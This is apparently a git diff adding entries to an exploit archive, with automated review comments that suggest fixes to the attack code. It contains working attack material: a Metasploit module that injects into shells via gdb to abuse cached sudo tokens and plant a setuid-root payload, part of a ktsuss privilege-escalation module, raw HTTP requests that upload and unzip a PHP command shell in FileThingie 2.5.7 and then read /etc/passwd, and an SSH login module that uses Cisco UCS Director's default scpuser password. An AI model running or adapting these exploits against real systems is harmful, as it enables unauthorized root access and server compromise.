"#{base_dir}/#{payload_name}" + upload_and_chmodx payload_path, generate_payload_exe + + print_status 'Executing payload ...' + id = cmd_exec 'whoami' + res = cmd_exec "#{ktsuss_path} -u #{id} #{payload_path} & echo " + vprint_line res + end +end \ No newline at end of file diff --git a/exploits/linux/local/47345.rb b/exploits/linux/local/47345.rb new file mode 100755 index 000000000..8afe41fe2 --- /dev/null +++ b/exploits/linux/local/47345.rb 
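Review bot: The `KTSUSS_PATH` option is described as `'Path to staprun executable'`, which is a copy-paste leftover from another module and will mislead operators reading `show options`; it should be `OptString.new('KTSUSS_PATH', [true, 'Path to ktsuss executable', '/usr/bin/ktsuss'])`. Note that `check` is not passive: it runs `#{ktsuss_path} -u #{id} id` on the target to see whether `uid=0` comes back, which is reasonable for a local module but worth a one-line comment such as `# Active check: runs a harmless command through ktsuss to confirm privileges are not dropped` so nobody assumes `check` is side-effect free. The `Description` says versions 1.4 and prior are affected while the tested list only names 1.3; since the CVE and the module name both cite 1.4 that is fine, but a short sentence stating that 1.4 was not directly tested would keep the description honest.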
@@ -0,0 +1,213 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+ Rank = ExcellentRanking
+
+ include Msf::Post::File
+ include Msf::Post::Linux::Kernel
+ include Msf::Post::Linux::Priv
+ include Msf::Post::Linux::System
+ include Msf::Exploit::EXE
+ include Msf::Exploit::FileDropper
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'ptrace Sudo Token Privilege Escalation',
+ 'Description' => %q{
+ This module attempts to gain root privileges by blindly injecting into
+ the session user's running shell processes and executing commands by
+ calling `system()`, in the hope that the process has valid cached sudo
+ tokens with root privileges.
+
+ The system must have gdb installed and permit ptrace.
+
+ This module has been tested successfully on:
+
+ Debian 9.8 (x64); and
+ CentOS 7.4.1708 (x64).
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'chaignc', # sudo_inject
+ 'bcoles' # Metasploit
+ ],
+ 'DisclosureDate' => '2019-03-24',
+ 'References' =>
+ [
+ ['EDB', '46989'],
+ ['URL', 'https://github.com/nongiach/sudo_inject'],
+ ['URL', 'https://www.kernel.org/doc/Documentation/security/Yama.txt'],
+ ['URL', 'http://man7.org/linux/man-pages/man2/ptrace.2.html'],
+ ['URL', 'https://lwn.net/Articles/393012/'],
+ ['URL', 'https://lwn.net/Articles/492667/'],
+ ['URL', 'https://linux-audit.com/protect-ptrace-processes-kernel-yama-ptrace_scope/'],
+ ['URL', 'https://blog.gdssecurity.com/labs/2017/9/5/linux-based-inter-process-code-injection-without-ptrace2.html']
+ ],
+ 'Platform' => ['linux'],
+ 'Arch' =>
+ [
+ ARCH_X86,
+ ARCH_X64,
+ ARCH_ARMLE,
+ ARCH_AARCH64,
+ ARCH_PPC,
+ ARCH_MIPSLE,
+ ARCH_MIPSBE
+ ],
+ 'SessionTypes' => ['shell', 'meterpreter'],
+ 'Targets' => [['Auto', {}]],
+ 'DefaultOptions' =>
+ {
+ 'PrependSetresuid' => true,
+ 'PrependSetresgid' => true,
+ 'PrependFork' => true,
+ 'WfsDelay' => 30
+ },
+ 'DefaultTarget' => 0))
+ register_options [
+ OptInt.new('TIMEOUT', [true, 'Process injection timeout (seconds)', '30'])
+ ]
+ register_advanced_options [
+ OptBool.new('ForceExploit', [false, 'Override check result', false]),
+ OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])
+ ]
+ end
+
+ def base_dir
+ datastore['WritableDir'].to_s
+ end
+
+ def timeout
+ datastore['TIMEOUT']
+ end
+
+ def upload(path, data)
+ print_status "Writing '#{path}' (#{data.size} bytes) ..."
+ rm_f path
+ write_file path, data
+ register_file_for_cleanup path
+ end
+
+ def check
+ if yama_enabled?
+ vprint_error 'YAMA ptrace scope is restrictive'
+ return CheckCode::Safe
+ end
+ vprint_good 'YAMA ptrace scope is not restrictive'
+
+ if command_exists? '/usr/sbin/getsebool'
+ if cmd_exec("/usr/sbin/getsebool deny_ptrace 2>1 | /bin/grep -q on && echo true").to_s.include? 'true'
+ vprint_error 'SELinux deny_ptrace is enabled'
+ return CheckCode::Safe
+ end
+ vprint_good 'SELinux deny_ptrace is disabled'
+ end
+
+ unless command_exists? 'sudo'
+ vprint_error 'sudo is not installed'
+ return CheckCode::Safe
+ end
+ vprint_good 'sudo is installed'
+
+ unless command_exists? 'gdb'
+ vprint_error 'gdb is not installed'
+ return CheckCode::Safe
+ end
+ vprint_good 'gdb is installed'
+
+ CheckCode::Detected
+ end
+
+ def exploit
+ unless check == CheckCode::Detected
+ unless datastore['ForceExploit']
+ fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'
+ end
+ print_warning 'Target does not appear to be vulnerable'
+ end
+
+ if is_root?
+ unless datastore['ForceExploit']
+ fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'
+ end
+ end
+
+ unless writable? base_dir
+ fail_with Failure::BadConfig, "#{base_dir} is not writable"
+ end
+
+ if nosuid? base_dir
+ fail_with Failure::BadConfig, "#{base_dir} is mounted nosuid"
+ end
+
+ # Find running shell processes
+ shells = %w[ash ksh csh dash bash zsh tcsh fish sh]
+
+ system_shells = read_file('/etc/shells').to_s.each_line.map {|line|
+ line.strip
+ }.reject {|line|
+ line.starts_with?('#')
+ }.each {|line|
+ shells << line.split('/').last
+ }
+ shells = shells.uniq.reject {|shell| shell.blank?}
+
+ print_status 'Searching for shell processes ...'
+ pids = []
+ if command_exists? 'pgrep'
+ cmd_exec("pgrep '^(#{shells.join('|')})$' -u \"$(id -u)\"").to_s.each_line do |pid|
+ pids << pid.strip
+ end
+ else
+ shells.each do |s|
+ pidof(s).each {|p| pids << p.strip}
+ end
+ end
+
+ if pids.empty?
+ fail_with Failure::Unknown, 'Found no running shell processes'
+ end
+
+ print_status "Found #{pids.uniq.length} running shell processes"
+ vprint_status pids.join(', ')
+
+ # Upload payload
+ @payload_path = "#{base_dir}/.#{rand_text_alphanumeric 10..15}"
+ upload @payload_path, generate_payload_exe
+
+ # Blindly call system() in each shell process
+ pids.each do |pid|
+ print_status "Injecting into process #{pid} ..."
+
+ cmds = "echo | sudo -S /bin/chown 0:0 #{@payload_path} >/dev/null 2>&1 && echo | sudo -S /bin/chmod 4755 #{@payload_path} >/dev/null 2>&1"
+ sudo_inject = "echo 'call system(\"#{cmds}\")' | gdb -q -n -p #{pid} >/dev/null 2>&1"
+ res = cmd_exec sudo_inject, nil, timeout
+ vprint_line res unless res.blank?
+
+ next unless setuid? @payload_path
+
+ print_good "#{@payload_path} setuid root successfully"
+ print_status 'Executing payload...'
+ res = cmd_exec "#{@payload_path} & echo "
+ vprint_line res
+ return
+ end
+
+ fail_with Failure::NoAccess, 'Failed to create setuid root shell. Session user has no valid cached sudo tokens.'
+ end
+
+ def on_new_session(session)
+ if session.type.eql? 'meterpreter'
+ session.core.use 'stdapi' unless session.ext.aliases.include? 'stdapi'
+ session.fs.file.rm @payload_path
+ else
+ session.shell_command_token "rm -f '#{@payload_path}'"
+ end
+ ensure
+ super
+ end
+end
\ No newline at end of file
diff --git a/exploits/php/webapps/47349.txt b/exploits/php/webapps/47349.txt
new file mode 100644
index 000000000..c55f35a39
--- /dev/null
+++ b/exploits/php/webapps/47349.txt
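Review bot: In `check`, the SELinux probe uses `2>1`, which in sh redirects getsebool's stderr into a file literally named `1` in the session's working directory instead of to stdout; it should be `2>&1`, i.e. `cmd_exec("/usr/sbin/getsebool deny_ptrace 2>&1 | /bin/grep -q on && echo true")`. As written, every run of `check` on a host with getsebool can leave a stray file `1` behind that is never registered for cleanup. Separately, in `exploit` the status line counts `pids.uniq.length` while the injection loop iterates `pids` unchanged, so a duplicate pid (possible on the `pidof` fallback path) would be injected twice; a `pids.uniq!` after the collection aligns the count with what actually runs. `system_shells` is assigned but never read, since the chain's `.each` appends straight to `shells`; the assignment can be dropped.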
@@ -0,0 +1,153 @@
+# Exploit Title: FileThingie 2.5.7 - Arbitrary File Upload
+# Author: Cakes
+# Discovery Date: 2019-09-03
+# Vendor Homepage: www.solitude.dk/filethingie
+# Software Link: https://github.com/leefish/filethingie/archive/master.zip
+# Tested Version: 2.5.7
+# Tested on OS: CentOS 7
+# CVE: N/A
+
+# Intro:
+# Easy arbitrary file upload vulnerability allows an attacker to upload malicious .zip archives
+
+::::: POST .zip file with cmd shell
+
+POST /filethingy/ft2.php HTTP/1.1
+Host: 10.0.0.21
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: https://10.0.0.21/filethingy/ft2.php?dir=/tester
+Content-Type: multipart/form-data; boundary=---------------------------3402520321248020588131184034
+Content-Length: 1117
+Cookie: issabelSession=67ne0anmf52drmijjf1s1ju380; PHPSESSIDnERPteam=tl1e1m4eieonpgflqa1colhqs2; nERP_installation=60kne7l4f54fico5ud4tona073; 100021corebos=ktk7mnr6pspnet6n2ij582e1v7; ci_cookie=a%3A4%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22175c2b30943f07368eef92a9dcdd2ecb%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A9%3A%2210.0.0.17%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A68%3A%22Mozilla%2F5.0+%28X11%3B+Linux+x86_64%3B+rv%3A60.0%29+Gecko%2F20100101+Firefox%2F60.0%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1567451164%3B%7D9ff869bbb4f3d937de5d566b82eaf01a; PHPSESSID=jl9jcj3vfqf53ujcj332gncpe7
+Connection: close
+Upgrade-Insecure-Requests: 1
+DNT: 1
+
+-----------------------------3402520321248020588131184034
+Content-Disposition: form-data; name="localfile-1567531192592"; filename=""
+Content-Type: application/octet-stream
+
+
+-----------------------------3402520321248020588131184034
+Content-Disposition: form-data; name="MAX_FILE_SIZE"
+
+2000000
+-----------------------------3402520321248020588131184034
+Content-Disposition: form-data; name="localfile"; 
filename="cmdshell.zip" +Content-Type: application/zip + +PK   š#O $ cmdshell.phpUT + ۟n]۟n]۟n]ux   ³±/È(P(ÎHÍɉO­HMÖP‰ww +‰VOÎMQÕ´VP°·ã PKý(tÅ& $ PK   š#Oý(tÅ& $ ¤ cmdshell.phpUT + ۟n]۟n]۟n]ux   PK   Z € +-----------------------------3402520321248020588131184034 +Content-Disposition: form-data; name="act" + +upload +-----------------------------3402520321248020588131184034 +Content-Disposition: form-data; name="dir" + +/tester +-----------------------------3402520321248020588131184034 +Content-Disposition: form-data; name="submit" + +Upload +-----------------------------3402520321248020588131184034-- + + + + + +:::::::::::::::::::::::::::::Unzip Malicious file + +POST /filethingy/ft2.php HTTP/1.1 +Host: 10.0.0.21 +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: https://10.0.0.21/filethingy/ft2.php?dir=/tester +Content-Type: application/x-www-form-urlencoded +Content-Length: 63 +Cookie: issabelSession=67ne0anmf52drmijjf1s1ju380; PHPSESSIDnERPteam=tl1e1m4eieonpgflqa1colhqs2; nERP_installation=60kne7l4f54fico5ud4tona073; 100021corebos=ktk7mnr6pspnet6n2ij582e1v7; ci_cookie=a%3A4%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22175c2b30943f07368eef92a9dcdd2ecb%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A9%3A%2210.0.0.17%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A68%3A%22Mozilla%2F5.0+%28X11%3B+Linux+x86_64%3B+rv%3A60.0%29+Gecko%2F20100101+Firefox%2F60.0%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1567451164%3B%7D9ff869bbb4f3d937de5d566b82eaf01a; PHPSESSID=jl9jcj3vfqf53ujcj332gncpe7 +Connection: close +Upgrade-Insecure-Requests: 1 +DNT: 1 + +newvalue=cmdshell.zip&file=cmdshell.zip&dir=%2Ftester&act=unzip + + + +::::::::::::::::::::::::::::::Access your shell + +GET /filethingy/folders/tester/cmdshell.php?cmd=whoami HTTP/1.1 +Host: 10.0.0.21 +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 
Firefox/60.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Cookie: issabelSession=67ne0anmf52drmijjf1s1ju380; PHPSESSIDnERPteam=tl1e1m4eieonpgflqa1colhqs2; nERP_installation=60kne7l4f54fico5ud4tona073; 100021corebos=ktk7mnr6pspnet6n2ij582e1v7; ci_cookie=a%3A4%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22175c2b30943f07368eef92a9dcdd2ecb%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A9%3A%2210.0.0.17%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A68%3A%22Mozilla%2F5.0+%28X11%3B+Linux+x86_64%3B+rv%3A60.0%29+Gecko%2F20100101+Firefox%2F60.0%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1567451164%3B%7D9ff869bbb4f3d937de5d566b82eaf01a; PHPSESSID=jl9jcj3vfqf53ujcj332gncpe7
+Connection: close
+Upgrade-Insecure-Requests: 1
+DNT: 1
+Cache-Control: max-age=0
+
+
+::::::::::::::::::::::::::::::Read /etc/passwd
+
+GET /filethingy/folders/tester/cmdshell.php?cmd=cat%20/etc/passwd HTTP/1.1
+Host: 10.0.0.21
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Cookie: issabelSession=67ne0anmf52drmijjf1s1ju380; PHPSESSIDnERPteam=tl1e1m4eieonpgflqa1colhqs2; nERP_installation=60kne7l4f54fico5ud4tona073; 100021corebos=ktk7mnr6pspnet6n2ij582e1v7; ci_cookie=a%3A4%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22175c2b30943f07368eef92a9dcdd2ecb%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A9%3A%2210.0.0.17%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A68%3A%22Mozilla%2F5.0+%28X11%3B+Linux+x86_64%3B+rv%3A60.0%29+Gecko%2F20100101+Firefox%2F60.0%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1567451164%3B%7D9ff869bbb4f3d937de5d566b82eaf01a; PHPSESSID=jl9jcj3vfqf53ujcj332gncpe7
+Connection: close
+Upgrade-Insecure-Requests: 1
+DNT: 1
+
+HTTP/1.1 200 OK
+Date: Tue, 03 Sep 2019 17:38:04 GMT
+Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16
+X-Powered-By: PHP/5.4.16
+Content-Length: 1738
+Connection: close
+Content-Type: text/html; charset=UTF-8
+
+root:x:0:0:root:/root:/bin/bash
+bin:x:1:1:bin:/bin:/sbin/nologin
+daemon:x:2:2:daemon:/sbin:/sbin/nologin
+adm:x:3:4:adm:/var/adm:/sbin/nologin
+lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
+sync:x:5:0:sync:/sbin:/bin/sync
+shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
+halt:x:7:0:halt:/sbin:/sbin/halt
+mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
+operator:x:11:0:operator:/root:/sbin/nologin
+games:x:12:100:games:/usr/games:/sbin/nologin
+ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
+nobody:x:99:99:Nobody:/:/sbin/nologin
+misdn:x:31:31:Modular ISDN:/:/sbin/nologin
+systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin
+dbus:x:81:81:System message bus:/:/sbin/nologin
+postfix:x:89:89::/var/spool/postfix:/sbin/nologin
+apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin
+polkitd:x:999:998:User for polkitd:/:/sbin/nologin
+cyrus:x:76:12:Cyrus IMAP Server:/var/lib/imap:/sbin/nologin
+mailman:x:41:41:GNU Mailing List Manager:/usr/lib/mailman:/sbin/nologin
+saslauth:x:998:76:Saslauthd user:/run/saslauthd:/sbin/nologin
+mysql:x:27:27:MariaDB Server:/var/lib/mysql:/sbin/nologin
+ntp:x:38:38::/etc/ntp:/sbin/nologin
+uucp:x:10:14:Uucp user:/var/spool/uucp:/sbin/nologin
+tss:x:59:59:Account used by the trousers package to sandbox the tcsd daemon:/dev/null:/sbin/nologin
+dhcpd:x:177:177:DHCP server:/:/sbin/nologin
+asterisk:x:997:994:Asterisk PBX:/var/lib/asterisk:/bin/bash
+spamfilter:x:1000:1000::/home/spamfilter:/bin/bash
+sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
+avahi:x:70:70:Avahi mDNS/DNS-SD Stack:/var/run/avahi-daemon:/sbin/nologin
+avahi-autoipd:x:170:170:Avahi IPv4LL Stack:/var/lib/avahi-autoipd:/sbin/nologin
+chrony:x:996:993::/var/lib/chrony:/sbin/nologin
+cakes:x:1001:1001:cakes:/home/cakes:/bin/bash
\ No newline at end of file
diff --git a/exploits/unix/remote/47346.rb b/exploits/unix/remote/47346.rb
new file mode 100755
index 000000000..3266e3206
--- /dev/null
+++ b/exploits/unix/remote/47346.rb
@@ -0,0 +1,139 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'net/ssh'
+require 'net/ssh/command_stream'
+
+class MetasploitModule < Msf::Exploit::Remote
+ Rank = ExcellentRanking
+
+ include Msf::Exploit::Remote::SSH
+
+ def initialize(info={})
+ super(update_info(info,
+ 'Name' => "Cisco UCS Director default scpuser password",
+ 'Description' => %q{
+ This module abuses a known default password on Cisco UCS Director. The 'scpuser'
+ has the password of 'scpuser', and allows an attacker to login to the virtual appliance
+ via SSH.
+ This module has been tested with Cisco UCS Director virtual machines 6.6.0 and 6.7.0.
+ Note that Cisco also mentions in their advisory that their IMC Supervisor and
+ UCS Director Express are also affected by these vulnerabilities, but this module
+ was not tested with those products.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'Pedro Ribeiro ' # Vulnerability discovery and Metasploit module
+ ],
+ 'References' =>
+ [
+ [ 'CVE', '2019-1935' ],
+ [ 'URL', 'https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190821-imcs-usercred' ],
+ [ 'URL', 'https://seclists.org/fulldisclosure/2019/Aug/36' ],
+ [ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/cisco-ucs-rce.txt' ]
+ ],
+ 'DefaultOptions' =>
+ {
+ 'EXITFUNC' => 'thread'
+ },
+ 'Payload' =>
+ {
+ 'Compat' => {
+ 'PayloadType' => 'cmd_interact',
+ 'ConnectionType' => 'find'
+ }
+ },
+ 'Platform' => 'unix',
+ 'Arch' => ARCH_CMD,
+ 'Targets' =>
+ [
+ [ 'Cisco UCS Director < 6.7.2.0', {} ],
+ ],
+ 'Privileged' => false,
+ 'DefaultTarget' => 0,
+ 'DisclosureDate' => 'Aug 21 2019'
+ ))
+
+ register_options(
+ [
+ Opt::RPORT(22),
+ OptString.new('USERNAME', [true, "Username to login with", 'scpuser']),
+ OptString.new('PASSWORD', [true, "Password to login with", 'scpuser']),
+ ], self.class
+ )
+
+ register_advanced_options(
+ [
+ OptBool.new('SSH_DEBUG', [false, 'Enable SSH debugging output (Extreme verbosity!)', false]),
+ OptInt.new('SSH_TIMEOUT', [false, 'Specify the maximum time to negotiate a SSH session', 30])
+ ]
+ )
+ end
+
+ def rhost
+ datastore['RHOST']
+ end
+
+ def rport
+ datastore['RPORT']
+ end
+
+ def do_login(user, pass)
+ factory = ssh_socket_factory
+ opts = {
+ :auth_methods => ['password', 'keyboard-interactive'],
+ :port => rport,
+ :use_agent => false,
+ :config => false,
+ :password => pass,
+ :proxy => factory,
+ :non_interactive => true,
+ :verify_host_key => :never
+ }
+
+ opts.merge!(:verbose => :debug) if datastore['SSH_DEBUG']
+
+ begin
+ ssh = nil
+ ::Timeout.timeout(datastore['SSH_TIMEOUT']) do
+ ssh = Net::SSH.start(rhost, user, opts)
+ end
+ rescue Rex::ConnectionError
+ return
+ rescue Net::SSH::Disconnect, ::EOFError
+ print_error "#{rhost}:#{rport} SSH - Disconnected during negotiation"
+ return
+ rescue ::Timeout::Error
+ print_error "#{rhost}:#{rport} SSH - Timed out during negotiation"
+ return
+ rescue Net::SSH::AuthenticationFailed
+ print_error "#{rhost}:#{rport} SSH - Failed authentication"
+ rescue Net::SSH::Exception => e
+ print_error "#{rhost}:#{rport} SSH Error: #{e.class} : #{e.message}"
+ return
+ end
+
+ if ssh
+ conn = Net::SSH::CommandStream.new(ssh)
+ ssh = nil
+ return conn
+ end
+
+ return nil
+ end
+
+ def exploit
+ user = datastore['USERNAME']
+ pass = datastore['PASSWORD']
+
+ print_status("#{rhost}:#{rport} - Attempt to login to the Cisco appliance...")
+ conn = do_login(user, pass)
+ if conn
+ print_good("#{rhost}:#{rport} - Login Successful (#{user}:#{pass})")
+ handler(conn.lsock)
+ end
+ end
+end
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 1e2696b43..86c580d5c 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
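Review bot: In `do_login`, the `rescue Net::SSH::AuthenticationFailed` branch is the only one that prints an error without a `return`; control then falls through to `if ssh` with `ssh` still nil and the method returns nil anyway, but the asymmetry with the neighbouring branches reads as an omission, so add `return` after that `print_error` for consistency. `:verify_host_key => :never` is presumably deliberate (appliance host keys are not known in advance) but deserves a one-line comment saying so, since it also means an interposed host on the path would not be detected. Passing `self.class` as the second argument to `register_options` is, I believe, flagged as deprecated by msftidy, and the other two modules in this commit omit it; likewise `'DisclosureDate' => 'Aug 21 2019'` differs from the ISO `'2019-03-24'` form used by the sibling modules.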
@@ -10674,6 +10674,8 @@ id,file,description,date,author,type,platform,port
 47333,exploits/windows/local/47333.py,"ChaosPro 2.1 - SEH Buffer Overflow",2019-09-02,"Jonathan Crosby",local,windows,
 47334,exploits/windows/local/47334.py,"ChaosPro 3.1 - SEH Buffer Overflow",2019-09-02,"Jonathan Crosby",local,windows,
 47341,exploits/windows/local/47341.txt,"Kaseya VSA agent 9.5 - Privilege Escalation",2019-09-02,NF,local,windows,
+47344,exploits/linux/local/47344.rb,"ktsuss 1.4 - suid Privilege Escalation (Metasploit)",2019-09-03,Metasploit,local,linux,
+47345,exploits/linux/local/47345.rb,"ptrace - Sudo Token Privilege Escalation (Metasploit)",2019-09-03,Metasploit,local,linux,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -17654,6 +17656,9 @@ id,file,description,date,author,type,platform,port
 47320,exploits/linux/remote/47320.c,"QEMU - Denial of Service",2019-08-20,vishnudevtj,remote,linux,
 47329,exploits/hardware/remote/47329.pl,"Cisco Email Security Appliance (IronPort) C160 - 'Host' Header Injection",2019-09-02,"Todor Donev",remote,hardware,
 47337,exploits/hardware/remote/47337.pl,"IntelBras TELEFONE IP TIP200/200 LITE 60.61.75.15 - Arbitrary File Read",2019-09-02,"Todor Donev",remote,hardware,
+47346,exploits/unix/remote/47346.rb,"Cisco UCS Director - default scpuser password (Metasploit)",2019-09-03,Metasploit,remote,unix,22
+47347,exploits/java/remote/47347.rb,"Cisco Data Center Network Manager - Unauthenticated Remote Code Execution (Metasploit)",2019-09-03,Metasploit,remote,java,443
+47348,exploits/hardware/remote/47348.rb,"Cisco RV110W/RV130(W)/RV215W Routers Management Interface - Remote Command Execution (Metasploit)",2019-09-03,Metasploit,remote,hardware,443
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -41696,3 +41701,4 @@ id,file,description,date,author,type,platform,port
 47339,exploits/multiple/webapps/47339.txt,"Alkacon OpenCMS 10.5.x - Cross-Site Scripting (2)",2019-09-02,Aetsu,webapps,multiple,
 47340,exploits/multiple/webapps/47340.txt,"Alkacon OpenCMS 10.5.x - Local File inclusion",2019-09-02,Aetsu,webapps,multiple,
 47343,exploits/php/webapps/47343.txt,"Craft CMS 2.7.9/3.2.5 - Information Disclosure",2019-09-02,"Mohammed Abdul Raheem",webapps,php,
+47349,exploits/php/webapps/47349.txt,"FileThingie 2.5.7 - Arbitrary File Upload",2019-09-03,cakes,webapps,php,